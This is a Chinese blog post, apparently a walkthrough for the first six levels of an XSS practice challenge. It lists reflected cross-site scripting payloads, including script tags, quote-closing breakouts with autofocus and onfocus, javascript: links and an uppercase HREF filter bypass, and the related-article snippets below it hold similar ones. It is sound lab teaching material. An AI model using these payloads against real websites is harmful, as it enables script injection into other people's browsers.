XSS挑战赛

最新推荐文章于 2023-03-06 22:15:45 发布
最新推荐文章于 2023-03-06 22:15:45 发布
阅读量554 收藏 1
点赞数 1
分类专栏: xss 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Golderant/article/details/78086974
版权

1.
有显示位,尝试直接使用
payload:?name=<script>alert(12);</script>

2.
发现有两个显示位
- 第一个在<h1></h1>标签对里,发现已经被过滤
- 第二个显示位在输入框里,尝试闭合双引号
设置自动聚焦,当聚焦时弹窗,成功
payload:?keyword=1" autofocus onfocus="javascript:alert(123)"

3.
尝试输入:检测XSS注入">XSS TEST
查看源代码:发现没有成功闭合双引号,尝试'>XSS TEST
查看源代码,发现成功闭合 并且转义了 ‘>’
输入:XSS' autofocus onfocus=javascript:alert() '

PayLoad:XSS'+autofocus+onfocus=javascript:alert()+'

4.
输入:">XSS
发现成功闭合双引号,且过滤了>
输入:" onfocus=javascript:alert()
查看源码,发现多了一个双引号,尝试后面加个空格,发现成功注入
PayLoad" onfocus=javascript:alert()

5.
输入:"'><script>alert()</script>
发现可以成功闭合双引号,还有标签对,此外将script转换成scr_ipt
再次尝试加入onfocus和onclick时,同样,on之间加入了下划线
尝试使用' "><a href=javascript:alert()>123</a>
点击超链接123,成功弹窗。
PayLoad' "><a href=javascript:alert()>123</a>

6.
同上一题,发现将href转换成了hr_ef,尝试使用大写HREF,成功绕过。
PayLoad' "><a HREF=javascript:alert()>123</a>

2017/11/15 13:21

Asserty666
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss挑战赛 level 1-13
yukinorong的博客
08-19 1001
08/19 刷题网站1 http://test.xss.tv xss挑战需要用火狐浏览器,可能是谷歌浏览器对xss有保护措施。 xss挑战 level 1 第一题为反射性xss,直接构造参数为<script>alert(1)</script>即可 xss挑战 level 2 查看源码发现输入框在Input标签中,先闭合标签,在插入。 "><script>a...
XSS Challenges 靶场通关解析
最新发布
Flag少侠的博客
05-06 2068
XSS Challenges(跨站脚本攻击挑战)是一种用于学习和测试跨站脚本(XSS)漏洞的实验性平台。这些挑战旨在帮助安全研究人员和开发人员了解XSS漏洞的工作原理、检测方法和防御技巧。通常,XSS Challenges平台提供一系列不同级别和类型的XSS漏洞场景,参与者需要利用这些漏洞实现特定的攻击目标。这些挑战可以包括在网页输入框中注入恶意脚本、利用DOM(文档对象模型)漏洞执行JavaScript代码等。参与者需要通过分析和利用漏洞,成功地触发XSS漏洞并实现攻击目标,从而完成挑战。
xss 挑战赛 — 解题思路
苏柳欣的博客
09-07 721
      发现了一个xss学习的平台,上面有xss靶机,顺便巩固下之前关于xss的一些知识,这个平台还是很不错的。 Level 1       第一关直接审查页面源代码可以通过get方式进行弹窗,无过滤,pass payload: <script>alert...
XSS挑战赛--Writeup(共16题)
1stPeak's Blog
06-10 2228
XSS挑战赛--解题思路 Level-1 Level-2 Level-3 Level-4 Level-5 Level-6 Level-7 Level-8 Level-9 Level-10 Level-11 Level-12 Level-13 Level-14 Level-15 Level-16 Level-1 源码: <!DOCTYPE html><!--STATUS OK-...
xss挑战赛小记 0x03(xssgame)
weixin_30273763的博客
09-13 189
0x00 继续做xss吧 这次是xssgame 地址 http://www.xssgame.com/ 一共八关 学到了很多东西 0x01 啥也没有 <svg/onload="alert(1)"> 0x02 显然是这个点了 ');alert(1)(' 就行了 多个属性用分号间隔 换行回车也行 0x03 换图片的时...
2020华为软件精英挑战赛初复赛赛题包.zip
05-26
《2020华为软件精英挑战赛初复赛赛题解析与知识点详解》 华为软件精英挑战赛,作为一项年度盛事,旨在挖掘并培养全球顶尖的软件开发人才,为IT行业的创新注入活力。2020年的比赛,以"CodeCraft2020"为主题,吸引了...
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
易智瑞比赛.zip
10-01
《易智瑞比赛.zip》是一个压缩包文件,其核心内容为“比赛项目源码”,这意味着它包含了一次编程竞赛或技术挑战的相关代码。这个压缩包中的子文件名为"ugc.hotel.web-master",暗示了这是一个关于用户生成内容(UGC...
ali安全挑战赛移动安全-2015-2016
02-18
【标题】:“ali安全挑战赛移动安全-2015-2016”揭示了这是一场由阿里巴巴主办的针对移动安全领域的竞赛,主要关注Android平台的安全问题。该比赛可能旨在提升参赛者对Android应用安全性的理解和防护能力,同时促进...
一些比赛或练习的writeup.zip
10-01
2. **Web安全**:源码可能包含有漏洞的Web应用,学习者需要识别SQL注入、XSS、CSRF等常见漏洞,并了解如何修复它们。 3. **密码学**:可能涉及到加密算法的实现,比如对称加密、非对称加密、哈希函数等,学习者需要...
XSS挑战赛 --前13关
weixin_34185512的博客
02-01 117
一、xss的形成原理xss 中文名是“跨站脚本攻击”,英文名“Cross Site Scripting”。xss也是一种注入攻击,当web应用对用户输入过滤不严格,攻击者写入恶意的脚本代码(HTML、JavaScript)到网页中时,如果用户访问了含有恶意代码的页面,恶意脚本就会被浏览器解析执行导致用户被攻击。常见的危害有:cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等。二、x...
XSS挑战赛(xsslabs)1~10关通关解析
黄乔国PHP
03-06 895
XSS挑战赛,里面包含了各种XSS的防御方式和绕过方式,好好掌握里面的绕过细节,有助于我们更好的去发现XSS漏洞以及XSS的防御。本文更多的是分享解析的细节,不是一个标准的答案,希望大家在渗透的时候有更多的思维。
xss挑战赛闯关笔记
weixin_30508309的博客
08-22 558
0x0 前言 在sec-news发现先知上师傅monika发了一个xss挑战赛的闯关wp([巨人肩膀上的矮子]XSS挑战之旅---游戏通关攻略(更新至18关)https://xianzhi.aliyun.com/forum/read/1462.html),去看了一下发现是前几天刚发现的平台,看了一下那个绕狗教程感觉挺不错的,xss却没有玩,那么正巧就玩一下,顺便学习一波别的师傅的思路。...
XSS挑战赛通关
0nc3的博客
08-05 717
前言 地址:https://xss.haozi.me 通关过程 0x00 根据它的服务器端代码可知,对输入没有任何过滤直接从<div>输出 payload: <script>alert(1)</script> 0x01 根据代码可知,对输入没有任何过滤直接从<textarea>输出,闭合一下标签 payload: </textarea&...
xss挑战(超详细小白)
weixin_64655821的博客
09-22 1345
xss挑战前十关
XSS挑战赛解题思路
多崎巡礼的博客
11-07 6315
xss挑战赛解题思路。。。 level1 &amp;amp;amp;amp;amp;amp;lt;!DOCTYPE html&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;lt;!--STATUS OK--&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;lt;html&amp;amp;amp;amp;amp;amp;gt; &amp;a
xss挑战赛-wp
Iambangbang的博客
08-20 961
prompt(1) to win problem 0   这道题没有别的特别之处,直接闭合标签然后构造就可以了,这里直接放payload ">prompt(1) 但是通过看大牛的wp这里也积累一些其他的思路, ">这个思路是利用了onload的免交互的特性 "onresize=prompt(1)>这个思路不常用,但是在IE10下,当页面第一次加载时,会调用resize事件,当把代
xss challenge挑战(1-5)较详细解答
imredboy的博客
02-14 3472
网上已经有很多关于xss挑战赛靶场的解题思路了,不过想想还是自己再写一篇好了,刚好为自己做个笔记 LEVEL 1 网上已经有很多关于xss挑战赛靶场的解题思路了,不过想想还是自己再写一篇好了,刚好为自己做个笔记 LEVEL 1  网上已经有很多关于xss挑战赛靶场的解题思路了,不过想想还是自己再写一篇好了,刚好为自己做个笔记 LEVEL 1 找xss漏洞和其他漏洞的方法一样,就是找输入接口,找到可以输入数据的地方,构建攻击字段达成攻击。 第一关中明显在url数据后get提交了参数 故构建xxxx/leva
2021强网杯网络安全挑战赛Nu1L Team Writeup分析
"2021强网杯Writeup--by Nu1L Team.pdf" 是一份关于第五届“强网杯”全国网络安全挑战赛的赛后分析报告,由Nu1L团队编写。报告涵盖了多个网络安全领域的挑战,包括CTF(Capture The Flag)竞赛、网络安全和信息安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值